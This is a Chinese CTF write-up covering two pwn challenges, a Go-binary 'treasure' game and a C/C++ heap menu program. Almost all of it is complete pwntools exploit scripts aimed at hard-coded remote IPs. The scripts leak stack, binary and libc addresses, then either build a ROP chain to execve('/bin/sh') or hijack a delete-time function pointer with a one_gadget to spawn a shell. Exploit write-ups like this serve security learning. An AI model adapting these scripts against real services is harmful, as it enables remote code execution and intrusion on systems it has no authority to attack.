
[原创]第8 第9题Writeup (队友代发)

2019-3-25 23:38
5014

8. 挖宝

Pwn
Go 1.6 Binary
Treasure4会往真的栈上写
预测Treasure4的位置,然后ROP

from pwn import *
from time import sleep
from ctypes import CDLL
import sys,os

# Word size for the p64/u64 packing helpers used throughout.
context.arch = "amd64"

# Challenge binary and the libc shipped with it.  Every numeric offset in this
# script is tied to these exact files and means nothing for other builds.
elf = ELF("./trepwn")
libc = ELF("./trelibc.so")

# Remote endpoint from the challenge hand-out.
host, port = "211.159.175.39", 8787

# Leftovers from the original solve; name_ptr, ret1 and padding are not read
# anywhere else in this script.
name_ptr = 0x489410
ret1 = 0xC820047CE0
padding = 'A' * 0x30
cc = False

# Round counter and the values pwn() fills in across its rounds.
endtime = 1
stackaddr = 0
baseaddr = 0
libcaddr = 0
cacheaddr = 0

# Local variant, kept for reference:
# io = process("./trepwn", env={'LD_PRELOAD': './trelibc.so'})
io = remote(host, port)

def mov(d):
    """Answer the ")>>" prompt with the movement string `d`."""
    # Brief pause so the prompt has fully arrived before we reply.
    sleep(0.1)
    prompt = ")>>"
    io.sendlineafter(prompt, d)
def msg(data):
    """Answer the ">> " prompt with `data`; sendlineafter appends the newline."""
    prompt = ">> "
    io.sendlineafter(prompt, data)



def pwn():
    """Run one round of the interaction that follows the "Cong" banner.

    mov_brute() calls this each time the banner is seen.  The module counter
    `endtime` selects the round (1..5); rounds 1-4 each send one line made of
    the same fixed prefix ('a'*48, two p64(1), 'a'*128) plus a round-specific
    tail, then read the 8 bytes that follow "message: " and store them in one
    of the module globals (stackaddr, baseaddr, libcaddr, cacheaddr).  Round 5
    uses those values to build the final line and hands the session over to
    io.interactive().

    Python 2 only: `print hex(addr)` is a statement and str is concatenated
    with the bytes returned by p64.  All hard-coded offsets are specific to
    the trepwn / trelibc.so files shipped with the challenge.
    """
    global endtime
    global stackaddr
    global baseaddr
    global libcaddr
    global cacheaddr
    # Round 1: single-byte tail; the value read back is kept as stackaddr.
    if endtime ==1:
        io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+'\xf8')#+p64(0XC820064250)+p64(0x200)+p64(0x200))
        io.recvuntil('message: ')
        addr = u64(io.recv(8))
        print hex(addr)
        stackaddr = addr
        endtime += 1 
        return
    # Round 2: tail is stackaddr+0x60.  The value read back has a fixed delta
    # subtracted and is rounded down to a page boundary.  The delta presumably
    # comes from a local run of the binary -- not verifiable from here.
    if endtime ==2:
        io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+p64(stackaddr+0x60))
        io.recvuntil('message: ')
        addr = u64(io.recv(8))
        print hex(addr)
        baseaddr = (addr-(0x55ff03397ee9-0x55ff032c0000 ))&0xfffffffffffff000
        info("base:0x%x",baseaddr)
        endtime +=1
        return
    # Round 3: tail is baseaddr+0x474ef0; the value read back minus a fixed
    # delta becomes libcaddr (no page alignment applied in this round).
    if endtime ==3:
        io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+p64(baseaddr+0x474ef0))
        io.recvuntil('message: ')
        addr = u64(io.recv(8))
        print hex(addr)
        libcaddr =addr -( 0x7f75ffa89950-0x7f75ff9f2000 )
        #io.interactive()
        info("libc:0x%x",libcaddr)
        endtime +=1
        return
    # Round 4: single-byte tail again; the value read back is kept as cacheaddr.
    if endtime ==4:
        io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+'\x18')#+p64(0XC820064250)+p64(0x200)+p64(0x200))
        io.recvuntil('message: ')
        addr = u64(io.recv(8))
        print hex(addr)
        cacheaddr = addr
        endtime += 1 
        #io.interactive()
        return
    #io.interactive()

    # Round 5: `rop` is the rebased syscall offset, add_rsp, the constant 59,
    # the libc "/bin/sh" address and three zero qwords; it is sent behind the
    # fixed prefix and a block of values derived from stackaddr and cacheaddr.
    # NOTE(review): add_rsp is not offset by baseaddr while syscall is; whether
    # that is intentional is not visible from this script.
    if endtime ==5:
        #raw_input()
        syscall = 0x186600
        add_rsp = 0xd72f4
        rop = p64(baseaddr+syscall)
        rop += p64(add_rsp)
        rop += p64(59)
        rop += p64(libcaddr+next(libc.search("/bin/sh"),))
        rop += p64(0)*3
        io.sendline('a'*(6*8)+p64(1)*2+'a'*(8*16)+p64(stackaddr-0xf8+0x38)+p64(0x30)*2+p64(0)*3+p64(1)+p64(0xcb4)+p64(cacheaddr)+p64(0x1)+p64(0x0)*2+rop)
        endtime+=1

        io.interactive()

    # Reached when endtime is already past 5, or after the round-5
    # interactive session returns -- in which case the session is opened twice.
    io.interactive()

#raw_input()
# Answer the name prompt, then collect the first three treasures: five steps
# in one direction each, followed by a 16-byte marker at the ">> " prompt.
name = 'AAAA'
io.sendlineafter("Please input you name :\n", name)

for idx, direction in enumerate("dwa", start=1):
    for i in range(5):
        mov(direction)
    msg(str(idx) * 0x10)
    info("Treasure %d found" % idx)

# Step once more before the sweep for the fourth treasure; `des` is the
# direction order that loop() cycles through.
mov('s')
mov('d')
des = 'dsaw'

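def mov_brute(d):
    """Send one movement `d` and check the next 0x13 bytes for "Cong".

    When the banner is present the module flag `cc` is set, a log line is
    emitted and pwn() is invoked.  Python 2 only: the reply is compared as a
    str.
    """
    # The original assigned a local `cc`, so the module-level flag never
    # changed; declare it global so the assignment is visible to callers.
    global cc
    io.sendlineafter(")>>", d)
    if "Cong" in io.recv(0x13):
        cc = True
        info("Treasure 4 found")
        pwn()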
def loop():
    """One sweep: every direction in `des`, three moves apiece, in order."""
    sleep(0.1)
    moves = [direction for direction in des for _ in range(3)]
    for direction in moves:
        mov_brute(direction)

# Sweep until mov_brute() sees the banner and hands off to pwn(), which ends
# in io.interactive().  Every 20 sweeps, 4 pending bytes are read and logged
# as a progress marker.
cnt = 0
while True:
    loop()
    cnt += 1
    if not cnt % 20:
        cod = io.recv(4)
        info("loop %d cod %s" % (cnt, cod))

9. C与C++

Pwn
delete的时候会调一个函数指针,利用这个性质来实现任意地址执行

from pwn import *
# Remote service; the local variant is kept for reference.
# p = process('./candcpp')
p = remote('154.8.222.144', 9999)

# Answer the name prompt with two packed 8-byte values (binary-specific).
name_payload = p64(0x400e10) + p64(0x4009a0)
p.recvuntil('name')
p.sendline(name_payload)
def c_malloc(l, s):
    """Menu option 1: request a C string of length `l`, then send `s` raw."""
    # Consume each prompt before answering it.
    for prompt, answer in (('>>', '1'), ('string', str(l))):
        p.recvuntil(prompt)
        p.sendline(answer)
    p.recvuntil('string')
    p.send(s)  # no newline added here; callers terminate `s` themselves

def c_free(idx):
    """Menu option 2: free the C string in slot `idx`."""
    steps = (('>>', '2'), ('string', str(idx)))
    for prompt, answer in steps:
        p.recvuntil(prompt)
        p.sendline(answer)

def cpp_new(l, s):
    """Menu option 3: request a C++ string of length `l`, then send `s` raw."""
    length = str(l)
    p.recvuntil('>>')
    p.sendline('3')
    p.recvuntil('string')
    p.sendline(length)
    p.recvuntil('string')
    p.send(s)  # raw send: no newline appended

def cpp_dele(idx):
    """Menu option 4: delete the C++ string in slot `idx`."""
    choice, slot = '4', str(idx)
    p.recvuntil('>>')
    p.sendline(choice)
    p.recvuntil('string')
    p.sendline(slot)

def _pair(value):
    """15-byte unit: the 8-byte packing of `value` followed by the same packing minus its last byte."""
    return p64(value) + p64(value)[:-1]


# Repeated payload fragments; every address is specific to the challenge binary.
FN_PAIR = _pair(0x401228)
PTR_PAYLOAD = _pair(0x602328 + 8) * 9 + _pair(0x602328) * 6 + '\n'

for _ in range(3):
    c_malloc(0xe, FN_PAIR + '\n')
c_malloc(0x100, FN_PAIR * 18 + '\n')
c_malloc(0x100, PTR_PAYLOAD)
for slot in (2, 1, 0):
    c_free(slot)
c_malloc(0xe, FN_PAIR * 15 + '\n')
c_free(0)
c_malloc(0xe, FN_PAIR * 15 + '\n')

# The delete path prints a hex address; subtract a fixed delta to get libc_base
# and add a fixed offset for `one`.  Both constants come from the challenge libc.
cpp_dele(0)
p.recvuntil('0x')
leaked = p.recvuntil('\n')[:-1]
addr = int(leaked, 16)
libc_base = addr - (0x7f1a7c683690 - 0x7f1a7c614000)
one = libc_base + 0xf02a4
info("libc:0x%x", libc_base)

# Second name prompt, then the same pointer payload in a fresh allocation.
p.recvuntil('name')
p.sendline(p64(one))
c_free(4)
c_malloc(0x100, PTR_PAYLOAD)
cpp_dele(0)
p.interactive()
